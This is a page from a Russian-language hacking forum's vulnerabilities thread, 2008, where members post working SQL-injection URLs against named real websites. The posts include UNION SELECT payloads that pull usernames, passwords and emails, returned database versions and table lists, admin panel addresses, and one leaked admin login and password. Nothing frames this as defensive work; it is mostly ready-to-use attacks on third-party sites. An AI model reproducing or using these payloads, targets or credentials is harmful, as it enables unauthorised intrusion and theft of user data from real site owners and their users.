ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6301  
Старый 13.08.2008, 18:51
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,1,2,3+from+drinksadmin/*

админка
http://www.fivedollarscripts.com/drinks/admin2

Ну тут тупо инекция пашет а в админку непопасть.
 
Ответить с цитированием

  #6302  
Старый 13.08.2008, 20:39
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://all4sims.de/board/filebase.php?userid=1'
lol истина гдето рядом -) мож даже скуль есть..
Код:
SQL-DATABASE ERROR

Database error in WoltLab Burning Board (2.3.6 pl2): Invalid SQL: SELECT username FROM bb1_users WHERE userid='1'' 
mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 
mysql error number: 1064 
mysql version: 5.0.45-community 
php version: 4.4.9 
Date: 13.08.2008 @ 18:37 
Script: /board/filebase.php?userid=1' 
Referer:
 
Ответить с цитированием

  #6303  
Старый 13.08.2008, 21:34
Glazz
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332

Репутация: 15
По умолчанию

Цитата:
Сообщение от Calcutta  
http://all4sims.de/board/filebase.php?userid=1'
lol истина гдето рядом -) мож даже скуль есть..
я так не думаю <_<
 
Ответить с цитированием

  #6304  
Старый 13.08.2008, 21:38
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Код:
http://www.myfourthirds.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,%206,7,8,concat_ws(0x3a,us er_email,user_passwd),10,11%20+from+users --
 
Ответить с цитированием

  #6305  
Старый 13.08.2008, 21:49
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Код:
http://www.ostim.org.tr/ostim/product.php?lang=ALM&productID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3/*
5.0.22:samidb:sami@localhost

table

[samidb]
[OLDcontentstatistics]
secenek
lang
tarih
[adresler]
adres
[anket]
ankettipi
anket
yayintarihi
kaldirmatarihi
icerik
 
Ответить с цитированием

  #6306  
Старый 13.08.2008, 22:40
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию

=)
Цитата:
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+user/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SC HEMA.columns/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SC HEMA.SCHEMATA/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SC HEMA.tables/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+user/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+dual/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+news/*

[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.columns/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.SCHEMATA/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.tables/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+contacts/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+dual/*
 
Ответить с цитированием

  #6307  
Старый 13.08.2008, 23:07
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Код:
http://members.lycos.co.uk/lyk7/gallery/viewphoto.php?photo_id=-1+UNION+SELECT+0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,concat(0x3a,version(),database(),us er()),0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439 --
Version:4.0.18-standard
DBname:lyk7_uk_db
User:lyk7_uk@eu1667f.lyceu.net
 
Ответить с цитированием

  #6308  
Старый 14.08.2008, 00:07
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию

Цитата:
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+INFORMAT ION_SCHEMA.columns/*
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+INFORMAT ION_SCHEMA.SCHEMATA/*
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+INFORMAT ION_SCHEMA.tables/*
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+customer s/*
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+dual/*

[OK] http://www.cleverits.de/news_start.php?cont_id=1&news_id=-326+UNION+SELECT+
1,2,3+FROM+user/*
[OK] http://www.cleverits.de/news_start.php?cont_id=1&news_id=-326+UNION+SELECT+
1,2,3+FROM+user/*
[OK] http://www.cleverits.de/news_start.php?cont_id=1&news_id=-326+UNION+SELECT+
1,2,3+FROM+news/*
[OK] http://www.cleverits.de/news_start.php?cont_id=1&news_id=-326+UNION+SELECT+
1,2,3+FROM+phpbb_users/*
+)
 
Ответить с цитированием

  #6309  
Старый 14.08.2008, 02:21
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Код:
http://www.superherohype.com/news/jamesbondnews.php?id=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2/*
Цитата:
4.1.22:superher_nextra:superher_nextra@shh-n1-int
Цитата:
chroot/home/superher/superherohype.com/nextra/include/net/nexcess/lib/NexDbUtil.php(180): DB Error: syntax error SELECT user_id, name, email, password, title, access FROM NEX_USERS WHERE user_id =
 
Ответить с цитированием

  #6310  
Старый 14.08.2008, 09:43
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://microsoft.ugt.ge/index.php?id=1_1&blogid=-1+union+select+1,2,3,4,5,concat(username,0x3a3a,pa ssword),7+from+authenticate+limit+0,10

админка: http://microsoft.ugt.ge/admin/

login ->microsoft
pass->mic_admin$
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ